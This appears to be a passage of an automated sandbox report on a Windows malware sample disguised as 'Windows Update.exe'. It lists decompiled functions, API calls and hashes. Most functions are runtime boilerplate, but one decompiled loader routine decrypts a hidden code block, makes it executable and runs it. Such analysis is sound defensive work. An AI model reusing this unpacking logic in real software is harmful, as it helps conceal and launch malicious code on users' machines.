				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                                                                                              0x004062c0
                                                                                              0x004062c7
                                                                                              0x004062ca
                                                                                              0x004062d3
                                                                                              0x004062d8
                                                                                              0x004062dd
                                                                                              0x004062e2
                                                                                              0x004062e5
                                                                                              0x004062e7
                                                                                              0x004062e7
                                                                                              0x004062ec
                                                                                              0x00406305
                                                                                              0x0040630b
                                                                                              0x00406310
                                                                                              0x004063af
                                                                                              0x004063b3
                                                                                              0x004063b8
                                                                                              0x004063b8
                                                                                              0x004063cc
                                                                                              0x004063d4
                                                                                              0x004063d4
                                                                                              0x00406316
                                                                                              0x00406319
                                                                                              0x0040631e
                                                                                              0x00406322
                                                                                              0x0040636e
                                                                                              0x00406370
                                                                                              0x00406372
                                                                                              0x00406377
                                                                                              0x0040638e
                                                                                              0x00406396
                                                                                              0x004063a6
                                                                                              0x004063a6
                                                                                              0x00406396
                                                                                              0x004063a8
                                                                                              0x004063a9
                                                                                              0x00000000
                                                                                              0x004063ae
                                                                                              0x00406324
                                                                                              0x00406329
                                                                                              0x0040632b
                                                                                              0x0040632d
                                                                                              0x0040632d
                                                                                              0x00406335
                                                                                              0x00406352
                                                                                              0x0040635c
                                                                                              0x00406361
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406363
                                                                                              0x00406369
                                                                                              0x00406369
                                                                                              0x00000000
                                                                                              0x00406369
                                                                                              0x00406339
                                                                                              0x0040633d
                                                                                              0x00406342
                                                                                              0x00406346
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406348
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                                                                                              • __alloca_probe_16.LIBCMT ref: 0040633D
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                                                                                              • __freea.LIBCMT ref: 004063A9
                                                                                                • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                              • String ID:
                                                                                              • API String ID: 313313983-0
                                                                                              • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                                                                              • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                                                                                              • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                                                                              • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 95%
                                                                                              			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x7e6e3833
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                                                                                              0x00405756
                                                                                              0x0040575a
                                                                                              0x00405761
                                                                                              0x00405765
                                                                                              0x00405773
                                                                                              0x00405789
                                                                                              0x0040578d
                                                                                              0x004057b6
                                                                                              0x004057b8
                                                                                              0x004057bc
                                                                                              0x004057bf
                                                                                              0x004057bf
                                                                                              0x004057c5
                                                                                              0x004057c7
                                                                                              0x00000000
                                                                                              0x004057c8
                                                                                              0x0040578f
                                                                                              0x00405798
                                                                                              0x004057a7
                                                                                              0x0040579a
                                                                                              0x0040579d
                                                                                              0x004057a3
                                                                                              0x004057a3
                                                                                              0x004057ab
                                                                                              0x00000000
                                                                                              0x004057ad
                                                                                              0x004057b0
                                                                                              0x004057b2
                                                                                              0x00000000
                                                                                              0x004057b2
                                                                                              0x004057ab
                                                                                              0x00405767
                                                                                              0x0040576c
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                                                                                              • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                                                              • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                                                                                              • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                                                              • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 71%
                                                                                              			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0xffffffff
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0xffffffff
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                                                                                              0x00404320
                                                                                              0x00404320
                                                                                              0x00404320
                                                                                              0x0040432a
                                                                                              0x0040432c
                                                                                              0x00404331
                                                                                              0x00404334
                                                                                              0x00404342
                                                                                              0x00404349
                                                                                              0x0040434e
                                                                                              0x00404351
                                                                                              0x00404354
                                                                                              0x00404366
                                                                                              0x0040436b
                                                                                              0x0040436d
                                                                                              0x00404378
                                                                                              0x0040437f
                                                                                              0x00404384
                                                                                              0x00404387
                                                                                              0x00404389
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040436f
                                                                                              0x0040436f
                                                                                              0x00000000
                                                                                              0x0040436f
                                                                                              0x00404356
                                                                                              0x00404356
                                                                                              0x00404357
                                                                                              0x00404357
                                                                                              0x0040435c
                                                                                              0x00404397
                                                                                              0x00404398
                                                                                              0x0040439e
                                                                                              0x004043a3
                                                                                              0x004043a6
                                                                                              0x004043a7
                                                                                              0x004043a8
                                                                                              0x004043af
                                                                                              0x004043b1
                                                                                              0x004043b3
                                                                                              0x004043b8
                                                                                              0x004043bb
                                                                                              0x004043c9
                                                                                              0x004043d5
                                                                                              0x004043d8
                                                                                              0x004043db
                                                                                              0x004043ed
                                                                                              0x004043f2
                                                                                              0x004043f4
                                                                                              0x004043ff
                                                                                              0x00404405
                                                                                              0x0040440d
                                                                                              0x0040440f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004043f6
                                                                                              0x004043f6
                                                                                              0x00000000
                                                                                              0x004043f6
                                                                                              0x004043dd
                                                                                              0x004043dd
                                                                                              0x004043de
                                                                                              0x004043de
                                                                                              0x00404411
                                                                                              0x00404412
                                                                                              0x00404412
                                                                                              0x004043bd
                                                                                              0x004043c3
                                                                                              0x004043c7
                                                                                              0x0040441a
                                                                                              0x0040441b
                                                                                              0x00404421
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004043c7
                                                                                              0x00404428
                                                                                              0x00404428
                                                                                              0x00404336
                                                                                              0x0040433c
                                                                                              0x00404340
                                                                                              0x0040438b
                                                                                              0x0040438c
                                                                                              0x00404396
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404340

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                                                                                              • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                                                                                              • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                                                                                              • _abort.LIBCMT ref: 0040439E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 88804580-0
                                                                                              • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                                                                              • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                                                                                              • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                                                                              • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                                                                                              0x004025ba
                                                                                              0x004025bf
                                                                                              0x004025cb
                                                                                              0x004025d0
                                                                                              0x004025d5
                                                                                              0x004025d7
                                                                                              0x004025e2
                                                                                              0x004025d9
                                                                                              0x004025d9
                                                                                              0x00000000
                                                                                              0x004025d9
                                                                                              0x004025cd
                                                                                              0x004025cd
                                                                                              0x004025cf
                                                                                              0x004025cf

                                                                                              APIs
                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                                                                                                • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                              • String ID:
                                                                                              • API String ID: 1761009282-0
                                                                                              • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                                                              • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                                                                                              • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                                                              • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405575, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405575() {

				 *0x412e78 = GetCommandLineA();
				 *0x412e7c = GetCommandLineW();
				return 1;
			}



                                                                                              0x0040557b
                                                                                              0x00405586
                                                                                              0x0040558d

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CommandLine
                                                                                              • String ID: P3_
                                                                                              • API String ID: 3253501508-2621628151
                                                                                              • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                                                                                              • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
                                                                                              • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                                                                                              • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Analysis Process: Windows Update.exe PID: 5844 Parent PID: 1060 Windows Update.exeCOMMON

                                                                                              Executed Functions

                                                                                              Function 6F722402, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 196filememoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,?,(0ro), ref: 6F7224DC
                                                                                              • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,(0ro,6F72218A,7FC6FA16,6F722349), ref: 6F722506
                                                                                              • ReadFile.KERNEL32(00000000,00000000,000000FF,?,00000000,?,?,?,?,?,?,?,?,(0ro,6F72218A,7FC6FA16), ref: 6F72251D
                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,(0ro,6F72218A,7FC6FA16,6F722349), ref: 6F72253F
                                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,(0ro,6F72218A,7FC6FA16,6F722349,000000FF,00000000), ref: 6F7225B2
                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,(0ro,6F72218A,7FC6FA16,6F722349), ref: 6F7225BD
                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,(0ro,6F72218A,7FC6FA16,6F722349,000000FF), ref: 6F722608
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                                              • String ID: (0ro
                                                                                              • API String ID: 656311269-2695748320
                                                                                              • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                                                              • Instruction ID: aa329c8b34d054a5595b82577eb5309b362f034ce7fc7afc4051c60bec0e03ac
                                                                                              • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                                                              • Instruction Fuzzy Hash: D5616B71E10608ABEB10DFA58A94BAEB7B5BF49710F108069E515EB390EB74DE01CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F70F530, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190libraryloadermemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E6F70F530(void* __ecx) {
				_Unknown_base(*)()* _v8;
				_Unknown_base(*)()* _v12;
				intOrPtr _t12;
				char _t51;
				void* _t53;
				signed int _t89;
				signed int _t91;
				signed int _t123;

				_t53 = __ecx;
				_v12 = GetProcAddress(LoadLibraryW(L"kernel32.dll"), "VirtualProtect");
				_v8 = GetProcAddress(LoadLibraryW(L"kernel32.dll"), "VirtualAlloc");
				 *0x6f727364 = VirtualAlloc(0, 0x11e1a300, 0x3000, 4);
				if( *0x6f727364 != 0) {
					_t12 =  *0x6f727364; // 0x2980000
					E6F70F900(_t53, _t12, 0x11e1a300);
					 *0x6f727360 = 0;
					while( *0x6f727360 < 0x13c5) {
						_t91 =  *0x6f727360; // 0x13c5
						_t4 =  &E6F722000 + _t91; // 0x6f000000
						 *0x6f727fe8 =  *_t4;
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) +  *0x6f727360;
						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) +  *0x6f727360;
						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
						 *0x6f727fe8 =  *0x6f727fe8 & 0x000000ff ^ 0x0000001b;
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) +  *0x6f727360;
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) >> 0x00000002 | ( *0x6f727fe8 & 0x000000ff) << 0x00000006;
						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) + 0x63;
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) >> 0x00000005 | ( *0x6f727fe8 & 0x000000ff) << 0x00000003;
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) + 0xa2;
						 *0x6f727fe8 =  *0x6f727fe8 & 0x000000ff ^  *0x6f727360;
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) >> 0x00000005 | ( *0x6f727fe8 & 0x000000ff) << 0x00000003;
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) + 0x94;
						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) +  *0x6f727360;
						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) +  *0x6f727360;
						 *0x6f727fe8 =  ~( *0x6f727fe8 & 0x000000ff);
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) + 0x92;
						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) >> 0x00000007 | ( *0x6f727fe8 & 0x000000ff) << 0x00000001;
						 *0x6f727fe8 =  *0x6f727fe8 & 0x000000ff ^  *0x6f727360;
						 *0x6f727fe8 =  ~( *0x6f727fe8 & 0x000000ff);
						 *0x6f727fe8 =  *0x6f727fe8 & 0x000000ff ^ 0x00000049;
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) - 0x6d;
						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
						 *0x6f727fe8 =  *0x6f727fe8 & 0x000000ff ^ 0x00000098;
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) -  *0x6f727360;
						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) -  *0x6f727360;
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) >> 0x00000003 | ( *0x6f727fe8 & 0x000000ff) << 0x00000005;
						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) >> 0x00000007 | ( *0x6f727fe8 & 0x000000ff) << 0x00000001;
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) + 0xcd;
						 *0x6f727fe8 =  *0x6f727fe8 & 0x000000ff ^ 0x000000a5;
						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) -  *0x6f727360;
						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
						 *0x6f727fe8 =  ~( *0x6f727fe8 & 0x000000ff);
						 *0x6f727fe8 =  *0x6f727fe8 & 0x000000ff ^  *0x6f727360;
						_t123 =  *0x6f727360; // 0x13c5
						_t51 =  *0x6f727fe8; // 0x0
						 *((char*)( &E6F722000 + _t123)) = _t51;
						_t89 =  *0x6f727360; // 0x13c5
						 *0x6f727360 = _t89 + 1;
					}
					VirtualProtect( &E6F722000, 0x13c5, 0x40, 0x6f727fe4);
					E6F722000(); // executed
					return 0;
				}
				return 0;
			}











                                                                                              0x6f70f530
                                                                                              0x6f70f54d
                                                                                              0x6f70f567
                                                                                              0x6f70f57b
                                                                                              0x6f70f587
                                                                                              0x6f70f595
                                                                                              0x6f70f59b
                                                                                              0x6f70f5a3
                                                                                              0x6f70f5be
                                                                                              0x6f70f5ce
                                                                                              0x6f70f5d4
                                                                                              0x6f70f5da
                                                                                              0x6f70f5ec
                                                                                              0x6f70f5fb
                                                                                              0x6f70f60e
                                                                                              0x6f70f61c
                                                                                              0x6f70f62c
                                                                                              0x6f70f63f
                                                                                              0x6f70f65a
                                                                                              0x6f70f669
                                                                                              0x6f70f678
                                                                                              0x6f70f694
                                                                                              0x6f70f6a7
                                                                                              0x6f70f6ba
                                                                                              0x6f70f6d6
                                                                                              0x6f70f6e8
                                                                                              0x6f70f6f7
                                                                                              0x6f70f709
                                                                                              0x6f70f718
                                                                                              0x6f70f72b
                                                                                              0x6f70f739
                                                                                              0x6f70f74c
                                                                                              0x6f70f75b
                                                                                              0x6f70f775
                                                                                              0x6f70f788
                                                                                              0x6f70f796
                                                                                              0x6f70f7a6
                                                                                              0x6f70f7b6
                                                                                              0x6f70f7c4
                                                                                              0x6f70f7d7
                                                                                              0x6f70f7ea
                                                                                              0x6f70f7f8
                                                                                              0x6f70f80b
                                                                                              0x6f70f827
                                                                                              0x6f70f835
                                                                                              0x6f70f850
                                                                                              0x6f70f862
                                                                                              0x6f70f874
                                                                                              0x6f70f886
                                                                                              0x6f70f895
                                                                                              0x6f70f8a4
                                                                                              0x6f70f8b6
                                                                                              0x6f70f8bc
                                                                                              0x6f70f8c2
                                                                                              0x6f70f8c7
                                                                                              0x6f70f5af
                                                                                              0x6f70f5b8
                                                                                              0x6f70f5b8
                                                                                              0x6f70f8e3
                                                                                              0x6f70f8eb
                                                                                              0x00000000
                                                                                              0x6f70f8ed
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(kernel32.dll,VirtualProtect), ref: 6F70F540
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6F70F547
                                                                                              • LoadLibraryW.KERNEL32(kernel32.dll,VirtualAlloc), ref: 6F70F55A
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6F70F561
                                                                                              • VirtualAlloc.KERNEL32(00000000,11E1A300,00003000,00000004), ref: 6F70F578
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc$AllocVirtual
                                                                                              • String ID: VirtualAlloc$VirtualProtect$kernel32.dll$kernel32.dll
                                                                                              • API String ID: 1786449878-3286849197
                                                                                              • Opcode ID: d98a243b14e000f678eabc7563dda6309fad6d324cb64c483da890eb2fd235b0
                                                                                              • Instruction ID: e044a537ff57c009549eb5773589b8792034aaab927d3123f174cd9412bc7a5d
